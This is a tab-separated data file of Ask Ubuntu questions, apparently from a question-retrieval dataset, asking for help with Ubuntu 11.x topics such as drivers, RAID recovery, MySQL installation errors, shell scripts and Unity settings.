fallback 'c ' locale . ( vlc:1817 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/radeon_drv_video.so libva : va_opendriver ( ) returns -1 [ 0x9905e84 ] main video output error : video output creation failed [ 0x8cb8a64 ] main decoder error : failed to create video output
86801	can i set different transparent backgrounds for terminal ?	i want transparent backgrounds in terminal but different background..
86802	what steps do i follow to run a stock hello world cgi script ?	assume i have finished installing a modern release of stock ubuntu , and have the following script . # ! /bin/sh echo `` content-type : text/html\n '' echo `` < html > < body > hello world < /body > < /html > '' how do i install and configure apache to serve a `` hello world '' web page from http : //localhost using this script ?
86807	search for all files with a .sql extension in folders and sub folders	i want to search for all files with the .sql extension in folders and sub-folders ( recursive ) . how can i do this ?
86816	need a ppa for the latest gcc	i 'm looking for a ppa with the latest and greatest version of gcc . i 'm too scared to switch to something totally unstable and knock my production system out of wack , but want the newest version of gcc . additionally i do n't want to waste tons of time building my own version of gcc .
86817	how do i delete my windows partition ?	i just installed ubuntu and it is great . however , i installed in beside the windows vista os . i now want to remove windows in an effort to improve performance . what is the easiest way to do this ?
86822	how can i copy the contents of a folder to another folder in a different directory using terminal ?	i am trying to copy the contents of a folder to another folder in a different directory using terminal . would somebody be able to provide me an example of the command line syntax required to achieve this ?
86826	how to make minecraft run smoothly ?	i have noticed that on windows , minecraft runs a lot smoother than on ubuntu 11.10 . what can i do to make it run smoother on here ? i have a ati mobility radeon hd 4250 graphics card . i do n't know which driver i am using , but i 'm not using the proprietary drivers that it asks you to download and install . and i believe i 'm using the newest java . i always keep my system updated .
86827	how can i stop ubuntu making my ttys a nice resolution ?	i have a nvidia card . binary drivers . no kms support . for these reasons , i 've been used to a fairly awful resolution in my ttys . i did once try increasing the resolution of the ttys using a grub hack but that had a huge effect on the performance of the x screen - so i nuked it . 11.10 seems to be applying a high resolution to terminals for me . i feel it might be slowing down my x screen ( both 2d and gaming performance is pretty poor ) so i want to revert things to when i could only fit three characters on the screen at once < /exaggeration > . i had a look in /etc/default/grub.d/00_header and started to cry . i 've no idea what i 'm looking for . when i did this before it was using a much simpler format .
86831	how to add different wallpapers in different workspaces but as shellscript ?	i want add different wallpapers in different workspaces but as necessary command line ..
86834	what does `` ( obsolete ) '' mean in ubuntu software center	i sometimes see software in ubuntu software center with `` ( obsolete ) '' at the end of the title . what does this mean ? are there any risks ? is there a simple way to get to a non-obsolete version ? for example , some git and rails tutorials online direct you to install git-core . usc says that git-core is obsolete . i guess i should just install git instead ?
86839	does bigger swap partition area helps faster `` suspend \ hibernate `` ?	when i suspend my computer it stores everything on ram on hard-disk and reloads it back to ram when i start my computer again does this data gets stored in swap area ? will having a 1 gb swap partition going to help lower suspend and resume time ? thanks .
86840	documentation for gnome shell extension development ?	i have been wanting to develop some gnome shell extensions since they are just in javascript , however i have been looking and there is practically zero documentation , everywhere i look people just say to use the basic gnome documentation , but this does not help , i can not find any documentation for the imports for extensions , or any kind of javascript api for the extension development , i tried looking through some of the tutorials ( most of which are for gnome 3.0 , not 3.2 ) , but nothing is helping . does anyone know if they are in progress of writing documentation for extension development ? i would really love some good documentation ...
86843	how to start a video from the terminal ?	the terminal is where everything gets done in linux . so if this is true , how can i play an avi video ( .avi extension ) from the terminal ?
86849	how to unzip a zip file from the terminal ?	just downloaded a .zip file from the internet . i want to use the terminal to unzip the file . what is the correct way to do this ?
86854	need to recover data from raid5 array with just two out of three working disks	when i go to bring up the array with mdadm , it complains i do n't have enough components to start it . this makes sense , since raid5 normally takes a minimum of three disks.. but i do n't want to buy another 2tb drive with prices what they are at the moment.. i just want to start it in degraded mode , get my data off of it , then use them as separate drives , copying the truly important stuff to both of them : )
86856	power consumption issue with kernel ?	i have aquired a samsung notebook , model rv420 ( core i3 sandy bridge ) , acording with the specifications the battery should work for aproximatly 6 hours , but in fact his duration was 2 hours and 45 minutes . i read about the kernel issue with power consumption and i found a patched kernel made by canonical ( https : //wiki.ubuntu.com/kernel/powermanagement ) . the patched kernel version is 3.0.0-13 , my ubuntu is updated with kernel 3.0.0-14 , the question is , this kernel version has the patch applied ? i already know the commands that can be added to grub , but some users have noticed that this damages the battery in some cases , so i not going to do this . i do n't have windows installed on this machine , so i ca n't compare power consumption . the kernel 3.0.0-14 has the patch , or it 's just the 3.0.0-13 ? if not , how can i install it ? p.s . : sorry for the english . thanks .
86861	unable to boot with all my drives plugged in - to / or a live usb	for a little over a year , my home server has been plugging away just fine . it had a 300gb ide drive with ubuntu on it , and three 2tb drives on sata ports in an mdadm raid5 array . i lost a drive last week , and it was suggested to just try restarting it before doing anything else . since doing that , however , i 've been completely unable to boot into a working ubuntu system without unplugging all of the 2tb drives . i 've identified the failed drive , as it does n't get recognized in bios at all , but when i plug either of the other working drives in , i ca n't start at all - even with a working live usb stick . when trying to boot from the normal system hard drive , i still get the grub menu , so i know it 's not an issue of which drive is being booted or anything like that.. it just goes to a black screen after grub and there is nothing written to /var/log/messages or dmesg for me to diagnose the next time . when using a perfectly good live usb stick , it hangs on the line about loading ... /vmlinuz . any advice/help would be appreciated .
86863	internal microphone not working on a compaq presario cq60	the internal microphone of my compaq presario cq60 is not working . i notice it when calling on skype i could not be understood . i checked if skype was disabling my microphone due to its auto regulator , but that was n't the problem . i controlled the audio option and when i notice that the microphone does not detect any sound in the previous version of ubuntu i did not have any issue with the microphone . can you help me ? let me know if you need any particular information thanks
86865	ubuntu one music shows random mp3 's as unknown artist/album on ipad and iphone	i ripped some of my cd 's to mp3 , and also put some of my mp3 's , which i had purchased from my zune account , into my ubuntu one cloud . most of them show up with the correct album art and album/artist names , but random songs will be sent to the unknown album/artist folders . i have been trying to get this to work right for over a month and i believe i am giving the app/cloud plenty of time to refresh and categorize my music ( sometimes i 'll wait a week ) . in my attempts to debug this i have removed all of my music from my cloud several times and have re-uploaded my music . i also tried uninstalling the apps on my ipad and iphone . it seems that some songs that were recognized previously will not be recognized and vice versa after the re-upload . and even some songs that i do n't upload again still show up in the unknown album/artist list , i.e . not go away . this is frustrating because i like to be able to click on an album and listen to it straight through without searching for some random missing song in the unknown listing . this seems like a serious bug . if it is n't please help me figure it out .
86869	inputting unicode mnemonics/diagraphs	how do you input unicode mnemonics ( rfc 1345 ) ? for example - then + gives â . this cheatsheet is nice reference . vim , emacs , screen and zsh all have the ability to enter these , however i am unsure how to do it in other gui programs ( e.g . firefox , chrome ) . how can i enter these ?
86871	problem with arrow-keys/scrolling in x11vnc	i 'm using x11vnc to connect through a ssh-tunnel to another computer ( running ubuntu 11.10 ) , and experiencing a strange `` bug '' : when i close the session to the host computer , the host is unable to scroll by continuously holding down the arrow key ( s ) , e.g . in firefox or in a terminal . instead the arrow keys will only scroll down a bit , and wait for next key-press . i have checked that they can scroll with the arrow-keys pre-vnc . so far the only solution i 've come up with is to restart the computer , which is kind of silly . i 'm guessing that x11vnc is corrupting `` something '' `` somewhere '' in x11 input devices . i 'm using these switches with x11vnc on the host : x11vnc -localhost -display :0 -scale 3/4 this is slightly annoying , but i fail to see how to correct this `` bug '' . does anybody have any suggestions ?
86872	moving files to different directories	i 'm trying to move media and other files which are in a specified directory to another directory , which will be created if it does not exist . and , i 'm trying to create a directory where the remaining files with different extensions will go . my first problem is that my script is not making a new directory and it is not moving the files to other directories . how can i move files with different extensions to one directory ? this is what i have had so far . please correct me where i 'm wrong and help modify my script : # ! /bin/bash from=/home/katy/doc to=/home/katy/mo # directory where the media files will go wa=/home/katy/do # directory where the other files will go if [ ! -d `` $ to '' ] ; then mkdir -p `` $ to '' fi cd $ from find . -type f -name '' *.mp4 '' -exec mv { } $ to \ ;
86877	how do i make lens filters work ?	i have created an rss feed lens based on unity-lens-python , but i can not get the filters to work . i 've also tried the original unity-lens-python and the filter does not work in that lens either . my lens can be found on my google documents page , and it would be great if someone could have a look into it .
86878	how to install gnome-app-install ?	the software centre is slow and annoying ( packages from additional repositories do n't show up sometimes etc . ) , so i want the old add/remove software application back . i 've found out that the package is called gnome-app-install . the problem is that it just wo n't let me install it . when i run sudo apt-get install gnome-app-install it tells me this : warning , 'software-center ' will be selected in stead of 'gnome-app-install' software-center is already the latest version . how do i get the old add/remove software application back ?
86879	opening home folder causes another file cabinet icon to appear	when i launch home folder from the unity dash , a files window opens instead of opening itself ( as default ) . also home folder icon launching works only once . normal behavior occurs when i set off 'have file manager handle the desktop ' on gnome-tweak-tool . the issue is , as you can see , that instead of opening a 'home folder ' window , a files window is opened ( gray drawer ) . the home folder launcher works only once , even after closing the files window .
86880	how do i install a text-only ubuntu server like i have had for years ?	it seems to be a regression in 11.10 that i can not install just a text-based server from the alternate media , there is no option visible in the installation , and no way to even turn it off that i can see . i do n't have a graphics card or monitor that work reasonably in graphical mode for most servers i run , because it is useless , unattended , consumes memory and other resources , etc .
86883	configure workspace to start applications	how would i go about to create a script which would start a set of applications in a given workspace ( ubuntu 11.10 ) ? eg . when developing my application x , i use one terminal to run the application , one terminal where i run spec 's , one instance of kate in a specific folder , one instance of firefox to a specific url and perhaps one instance of a database admin tool loaded with the dev db . but i do not work on this application everytime i use my computer , so i would like to kickstart a script which would do something like this in a given workspace : start terminal in folder for x and run all spec's start new terminal in folder for x and start application run kate in folder for x start firefox with url to x start db-admin with dev db for x
86884	join free space on 2 different drives ( eeepc with 2 ssds )	i have an eee pc 901 that has 2 ssd drives 4 gb and 8gb . i installed `` ubuntu 10.04 lts - the lucid lynx '' , and i 'm very happy with it . my only problem is that if i go to my home/ or `` file system '' i only have 168mb , but if i go to `` 16 gb file system '' ( mounted in /media/ ) i have 8.4 gb . my question is , is it possible to join ( something like unpartitioning , if that 's even a word ) the 2 disks ? or is it possible to put some parts of linux on one disk and others on the other ? additional info : result from `` > df -h '' filesystem size used avail use % mounted on /dev/sda1 3.5g 2.8g 606m 83 % / none 493m 272k 493m 1 % /dev none 497m 1000k 496m 1 % /dev/shm none 497m 88k 497m 1 % /var/run none 497m 0 497m 0 % /var/lock none 497m 0 497m 0 % /lib/init/rw /dev/sdb1 15g 5.7g 8.4g 41 % /media/9c9235be-7475-4448-9b05-b9222dce7660
86885	how to skip the particular host in ssh ?	i have setup-ed keybased authentication to access all my client machines using ssh . however if i run anyscript in these clients , and suppose if particular hosts is down the terminal hangs in that session and it takes long time to go to the next hosts . is there any other way to solve this issue ? or is it possible to skip the host which is down so that it should go with the next host ? i am using ubuntu 11.04 . can some one help me ? thanks in advance .
86889	how to disable mouse hover at top left corner on 'activities ' action	instead of hovering mouse hover 'activities ' ( top-left corner ) i want only mouse click on it to open the 'activities ' menu . thanks .
86890	how to completely reformat a usb using fdisk ?	i have a usb drive which i would like to put a linux distribution on but it already has some files on it on /dev/sdc1 . using fdisk , i deleted the first partition and wrote the changes . when i printed the table , the first partition was gone . then i created a new partition ( /dev/sdc1 ) . however when i wrote these changes to the usb , the old files were still there . i followed these instructions after deleting the first partition http : //www.zorge.net/ ? p=22 are there any commands in fdisk ( i 'm trying to get comfortable in fdisk , so no gparted for me ) to completely wipe out all the information on a drive ?
86894	unity launcher right click focus	when right clicking an icon in the unity launcher , the menu comes up but i cant select anything . its like unity does not have focus at all . i have to click somewhere on the desktop and then the right click menu works correctly . this happens on all my installations of 11.10 , but only after login . this is a serious bug since it totally breaks unity if you dont know how to get around the bug . anyone experienced this ?
86899	how can i learn shell programming ?	what are the tools needed for shell development , and are there examples ?
86901	installation 11.10	i have installed 11.10 on my laptop.hddwas 160gb partioned 100gb as ext3 amd 20gb for swap.have xp sp3 home on same drive.installation went ok but now i do not have option to boot to dif
86905	how to have editing capabilities in command line apps that do not provide them	there are some command line programs that take input from the user , but do not provide editing capabilities , like sh ( alias dash ) , or nslookup and others . there is a way to force such applications to provide editing capabilities to correct the current line or recall previous lines ?
86910	git , svn , mercurial and bazaar packages available to install ( gui & terminal )	what packages are available in ubuntu to use the following distributed version control systems via terminal or gui ? git svn mercurial bazaar
86912	ca n't get wireless to work on dell inspiron 6000 laptop	i ca n't connect to any wireless networks and my laptop even does n't detect any at all . although when i boot into windows , my wireless works just fine . when i mouse over my network icon in the main panel , it says device not ready firmware missing i am new to ubuntu and just installed it yesterday . i 've done the additional drivers search in the system settings and there are no drivers left to download . i 'm on ubuntu 11.10 and i would appreciate any help concerning my problem with the wireless connection .
86917	lubuntu for older laptop ?	i have an old dell laptop with 128 mb ram . it readily boots up and runs the edgy eft 6.10 livecd . this livecd has an old firefox 2 on it which some websites do n't like . i would also like to run flash so i am thinking that lubuntu is the way to go . which version would allow install of adobe flash player or google chrome ? thanks
86919	is there an application to create windows with messages ?	i want to do something to create a window , preferably marked as on-top , with a configurable message . is there an ubuntu package for that ? the idea to put the relevant command inside a script : # ! /bin/csh docommand `` hello world ''
86920	when theme install i get an error : this script can not be ran with administrative privileges	dialog msg -- > then try again.you may need to reboot.installation will now abort ... this script can not be ran with administrative privileges . the script elevates on its own . please run the script with standard user privileges . installation will now abort . help me . ( as root sh guiinstall.sh ) help me..
86923	how can i reinstall binary file /usr/bin/ld ?	i have inadvertently overwritten file /usr/bin/ld . how can i reinstall this file ?
86925	problem with nvidia gt 545 driver on a dell xps 8300	i 'm having problems with the gpu on my new dell xps 8300 . after some problems installing ubuntu 11.10 64bit ( it kept failing after listing the `` attached scsi removable disk '' s ) i realized it was the gpu stopping installation so i unplugged it and unused the onboard graphics and everything installed fine . the gpu is nvidia gt 545 1gb ddr5 i checked there was a linux driver before ordering that one and there is , not sure if the open source one covers this hardware and works well but i 'm happy to use either . when i plug in the gpu it stops the system booting ( even if i 'm not using it and have the monitor still plugged in to the motherboard vga ) . very early in the boot an error code comes up and the system seems frozen udev sbin pci . . . [ 177 ] i wondered if i should install the driver before connecting the gpu but when i try that it tells me there is no card installed and so i ca n't do that . i 'm fairly sure the gpu works as the system came with windows and i had a quick look at that to confirm it was annoying and i should wipe and install linux and the gpu worked fine there . so i 'm not sure how to even attempt to solve this and any advice would be much appreciated .
86926	how to stream a video with vlc in a lan	i wish to execute a video in my pc and stream it in the lan so anybody can connect to it and watch it . what steps do i need to do to accomplish this in an easy manner .
86927	disabling unity autohide is not working	i have disabled the autohide of unity , still unity side bar is hiding when i am maximizing any application . i have attached the screen shot . right now auto hide is disabled but the left unity bar is hidden . i am using unity3d with ati drivers . any solution to disable unity hiding will be great help . i have rebooted the machine . actually , i found that any changes made through the ccsm is not affecting unity . : (
86928	sound preview / vista previa de archivos de sonido	me gustară­a volver a tener vista previa en los archivos de sonido como en las versiones anteriores de ubuntu cuando pasaba el muose por encima del icono . gracias i want hear a preview sound when i put the mouse 's arrow over sound 's icons . thanks
86929	is it possible to do a screencast with a webcam inside the screen	i was wondering if there is a screencast that can add the webcam to a corner of the screen or if a screencast supports recording the screen with a webcam playing in the background . like a live webcam inside the screen as seen in several video recordings where the recorder uses his webcam and records the actions in the screen plus him showing himself with a webcam in one of the corners . what i want to ask is which of this is recommended when recording a desktop with a webcam also running : screencast that supports recording the desktop + the webcam . start a live feed from the webcam and put it on the desktop . then record the whole desktop including the webcam in good quality ( not jumping frames ) record the desktop and then record the webcam in different times . then put them together in a video editor like openshot . anybody with experience with this would be nice .
86939	error while installing mysql-server-5.1	i need to install mysql-server-5.1 on ubuntu 11.10 . while installing with apt-get i am getting dpkg : error processing mysql-server-5.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 i have tried following things : sudo apt-get purge mysql-common rebboting the machine and again trying to install mysql by running sudo apt-get install mysql-server-5.1 but no success . still i am getting the similar error . in syslog i am getting following lines : dec 11 20:26:02 ubuntu mysqld [ 11272 ] : 111211 20:26:02 innodb : shutdown completed ; log sequence number 0 145554 dec 11 20:26:02 ubuntu mysqld [ 11272 ] : 111211 20:26:02 [ note ] /usr/sbin/mysqld : shutdown complete dec 11 20:26:02 ubuntu mysqld [ 11272 ] : dec 11 20:26:02 ubuntu mysqld [ 11291 ] : 111211 20:26:02 [ note ] plugin 'federated ' is disabled . dec 11 20:26:02 ubuntu mysqld [ 11291 ] : 111211 20:26:02 innodb : initializing buffer pool , size = 8.0m dec 11 20:26:02 ubuntu mysqld [ 11291 ] : 111211 20:26:02 innodb : completed initialization of buffer pool dec 11 20:26:02 ubuntu mysqld [ 11291 ] : 111211 20:26:02 innodb : started ; log sequence number 0 145554 dec 11 20:26:02 ubuntu mysqld [ 11291 ] : 111211 20:26:02 innodb : starting shutdown ... dec 11 20:26:08 ubuntu mysqld [ 11291 ] : 111211 20:26:08 innodb : shutdown completed ; log sequence number 0 145554 dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 [ note ] plugin 'federated ' is disabled . dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 innodb : initializing buffer pool , size = 8.0m dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 innodb : completed initialization of buffer pool dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 innodb : started ; log sequence number 0 145554 dec 11 20:26:08 ubuntu mysqld [ 11306 ] : error : 1050 table 'plugin ' already exists dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 [ error ] aborting dec 11 20:26:08 ubuntu mysqld [ 11306 ] : dec 11 20:26:08 ubuntu mysqld [ 11306 ] : 111211 20:26:08 innodb : starting shutdown ... dec 11 20:26:13 ubuntu mysqld [ 11306 ] : 111211 20:26:13 innodb : shutdown completed ; log sequence number 0 145554 dec 11 20:26:13 ubuntu mysqld [ 11306 ] : 111211 20:26:13 [ note ] /usr/sbin/mysqld : shutdown complete dec 11 20:26:13 ubuntu mysqld [ 11306 ] : let me know how to solve this issue .
86940	will jpeg files be reuploaded to ubuntu one if i change their exif data ( e.g . add a tag ) ?	i have my photo collection synced to ubuntu one and i 'm wondering what will happen if i use shotwell/f-spot to add tags to my photos ( by default those apps seem not to write metadata changes to the files themselves , but i 've changed that ) . will the changed files be uploaded again or is ubuntuone smart enough to upload just the changes ?
86942	update all packages of 11.04 , then upgrade to 11.10 or upgrade to 11.10 without updating packages ?	note - title should be changed to something more into what am asking ... there are 2 cases i have seen when upgrading someone from the previous version of ubuntu to the latest . when the user has not even done an update for a while so now he/she has the updates for that version of ubuntu and also the distribution upgrade pending . the user is up to date with all the updates for that particular version of ubuntu and only needs to upgrade to the new distribution version . i always recommend updating every package and then upgrading to the new distribution ( just in case , maybe it 's me but i feel safer this way . it is more logical i guess ) . but what would happened or if it possible to upgrade to the latest distribution without first updating the packages for the version of ubuntu used in that case . let us put a scenario : sam has 11.04 updated until august . after that he simply decided not to keep updating the 11.04 packages . 11.10 arrives and now the big new 11.10 distribution version available ! ! ! download now ! ! free with 2 beers from bruno pereira ! . so now sam has 2 options , either update all packages of 11.04 and the upgrade to 11.10 or just upgrade to 11.10 . what positive/negative feedback can sam get with using one of the 2 forms .
86949	why does my machine suddenly not allow the `` sudo '' command ?	i was working on my machine . i did some clamav virus definition updates , ran clamav and everything worked fine using sudo . suddenly afterwards though , my machine started saying that sudo : no valid sudoers sources found , quitting what in the world is going on ?
86950	windows backup loaded to ubuntu	i have a backup copy of my windows 7 machine i made before i converted to ubuntu . is there a utility that i can use to load it onto the machine now , even though i 'm only running ubuntu ? please help i need these files back ! update i used the windows back-up utility that came installed . i can view all the files on my external that i used in .zip folders but when i unzip them they 're strewn about randomly and in invalid formats
86951	mythtv works ok but other sounds do not with nvidia hdmi , what to do ?	i have a home theater personal computer . it is connected via hdmi to a samsung hdtv and then by optical cable to a 5.1 receiver . mythtv plays very well , the problem is other computer sounds . these seem to overdrive the the speakers - causing loud spitting unless the volume is very low.. for instance , when playing audio using firefox and mog.com when the alsa plug-in [ npviewer.bin ] is set low enough to stop the spitting from overdriving in sound preferences/application , the volume is too low to be useful and the volume level of the right speaker is much louder than other speakers . the same thing happens when playing an audio cd and with system sounds . the alsa mixer shows only four check boxes for playback and , iec958 , iec958 1 , iec958 2 , and iec958 3 ; with the first two checked . only iec958 1 affects the audio . for capture , it reports the device does not have any capture devices . the specs are : ubuntu 10.10 ( fully updated ) linux 2.6.35-31-generic ( x86_64 ) athlon ( tm ) x3 445 processor ( 3x3.1ghz ) 4055mb audio adapter : hda-intel-hda nvidia [ nvidia corporation high definition audio controller/ ( rev a1 ) ] geforce gt 240/pci/sse2 mythtv fixes/0.24 ( v0.24.1-112-g40f3bae ) the motherboard has built in sound that is disabled in the bios . alsa-info here . the loaded snd modules : snd_hda_codec ⋯ hda codec core snd_hda_codec_nvhdmi ⋯ nvidia hdmi hd-audio codec snd_hda_intel ⋯ intel hda driver snd_hwdep ⋯ hardware dependent layer snd_page_alloc ⋯ memory allocator for alsa system . snd_pcm ⋯ midlevel pcm code for alsa . snd_rawmidi ⋯ midlevel rawmidi code for alsa . snd_seq ⋯ advanced linux sound architecture sequencer . snd_seq_device ⋯ alsa sequencer device management snd_seq_midi ⋯ advanced linux sound architecture sequencer midi synth . snd_seq_midi_event ⋯ midi byte < - > sequencer event coder snd_timer ⋯ alsa timer interface from lspci -vvnn for nvidia 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt215 [ geforce gt 240 ] [ 10de:0ca3 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : evga.com . corp. device [ 3842:1242 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 18 region 0 : memory at fc000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at ce000000 ( 64-bit , prefetchable ) [ size=32m ] region 5 : i/o ports at d800 [ size=128 ] [ virtual ] expansion rom at fde80000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 78 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s unlimited , l1 < 64us exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag+ phantfunc- auxpwr- nosnoop+ maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x16 , aspm l0s l1 , latency l0 < 512ns , l1 < 4us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 128 bytes disabled- retrain- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x16 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 128 v1 ] power budgeting < ? > capabilities : [ 600 v1 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nvidia kernel modules : nvidia-current , nouveau , nvidiafb 01:00.1 audio device [ 0403 ] : nvidia corporation high definition audio controller [ 10de:0be4 ] ( rev a1 ) subsystem : evga.com . corp. device [ 3842:1242 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin b routed to irq 19 region 0 : memory at fde7c000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 78 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 4us , l1 < 64us exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag+ phantfunc- auxpwr- nosnoop+ maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x16 , aspm l0s l1 , latency l0 < 512ns , l1 < 1us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm l0s l1 enabled ; rcb 128 bytes disabled- retrain- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x16 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db kernel driver in use : hda intel kernel modules : snd-hda-intel
86952	dell inspiron m5030 boots to a black screen with a mouse pointer	i have a dell inspiron m5030 and i have successfully installed ubuntu 11.10 64-bit . whenever i boot with ubuntu it boots to a black screen with the mouse pointer , or the default background with the mouse pointer . any help would be appreciated thanks .
86959	any way of maintaining permissions when using ntfs mounted drive in ubuntu ?	in my web development work , i use ubuntu almost exclusively . but there are occasions where i need to boot up windows -- to check a layout in ie , to reslice a comp in photoshop -- and i want to be able to share my entire localhost environment between the two . here 's my current workflow : in ubuntu : rsync the directory of the site i 'm working on from /var/www to /windows/wamp/www ( where /windows is the mount location of my windows ntfs partition as set in fstab ) . rsync the mysql database from /var/lib/mysql to /windows/wamp/bin/mysql/ { mysql version } /data . shut down , boot windows , edit files , save , restart again . back in ubuntu , look for changed files and rsync back to /var/www , ignoring the permissions changes that have happened when moving the files to the ntfs partition . i do n't like keeping two copies of my entire development environment , and i do n't like having to manually sync them . ideally i 'd like to copy my entire /var/www folder into the windows partition and symlink to it , and do the same thing for my databases . but the permissions changes that happen cause no end of headaches when doing that . so my question is two-part , i guess : is there any way of copying files from ext4 drive partitions to ntfs partitions that maintains the unix permissions in a way that they can be synced back ? or , is there a better way of sharing the entire localhost environment between windows and linux partitions ?
86974	what is the `` canary thread '' and why is it starving ?	the following occasionally appears in /var/log/syslog : rtkit-daemon [ 1145 ] : the canary thread is apparently starving . taking action . rtkit-daemon [ 1145 ] : demoting known real-time threads . rtkit-daemon [ 1145 ] : successfully demoted thread 1431 of process 1368 ( n/a ) . rtkit-daemon [ 1145 ] : successfully demoted thread 1430 of process 1368 ( n/a ) . rtkit-daemon [ 1145 ] : successfully demoted thread 1368 of process 1368 ( n/a ) . rtkit-daemon [ 1145 ] : demoted 3 threads . what 's going on here ?
86975	how do i download ubuntu one files to my new computer ?	i need to know how to down load all my sync'ed folders from ubuntu one to my new computer..
86977	how to correctly enable desktop cube in unity 3d ?	i have read several questions regarding how to fix an already enabled desktop cube or the problems it had in 11.04 . but in 11.10 , how can i correctly enable desktop cube in unity 3d ?
86979	grub or windows bootloader for dual boot ?	i 've used ubuntu using wubi for a couple of months and decided that this was not what i wanted and that ubuntu should have its own partition . i have it set up like that now . my dilemma deals with what bootloader to use as the primary one . as it is now , after my laptop 's splash screen , grub 2 shows up and one of the options is windows . my concern is that some problem with either ubuntu or windows would make it so the respective bootloader wo n't work and the operating system that is perfectly fine wo n't be able to be accessed because of the failure of one of the bootloaders . so , i was wondering if there is a general consensus as to which bootloader to have in charge . thanks in advance . edit : so one bootloader is not inherently more secure than the other ? i have read that holding shift on boot makes grub appear but would this be the case even if something happened to the ubuntu install ? or do i not have much to worry about because ubuntu is pretty stable , as long as i stay with the 6 month release cycle ?
86982	recovery of deleted folders in home folder	by accident i 've removed some folders ( they were empty ) in my home folder . i 've created a new ones but they does n't have proper icons etc ... how can i recreate them step by step ?
86986	wireless connects to internet but wired does not , both connect to gateway untangle firewall , what to do ?	my home lan is set up with fixed ip addresses and an untangle gateway/firewall/dns server with internet access . one of my computers ( ubuntu 10.10 ) will connect to the internet only through the wireless , but reports `` network is unreachable '' when connected to wired . even though it will not connect to the internet , it will connect to other computers on the lan , including the gateway when using the wired connection.. my laptop ( 11.10 ) and another system ( 10.10 ) connect either way . i use the same ip address for both wired and wireless on the same computer , and always disable wireless when using wired . the laptop uses wicd because network manager fails on it . i would like to be able to connect to the internet using wired connection , how can i do this ?
86990	new tweetdeck custom launcher to run under unity 11.10	i am looking to create a custom launcher for the new tweetdeck ( which works fine under wine ) . i am currently just executing the script : # ! /bin/bash wine ~/.wine/drive_c/program\ files/twitter/tweetdeck/tweetdeck.exe but this has the nasty disadvantage that you can not close the terminal that spawned the window . has anyone made a custom launcher for unity ( with the new icon would be nice ) ?
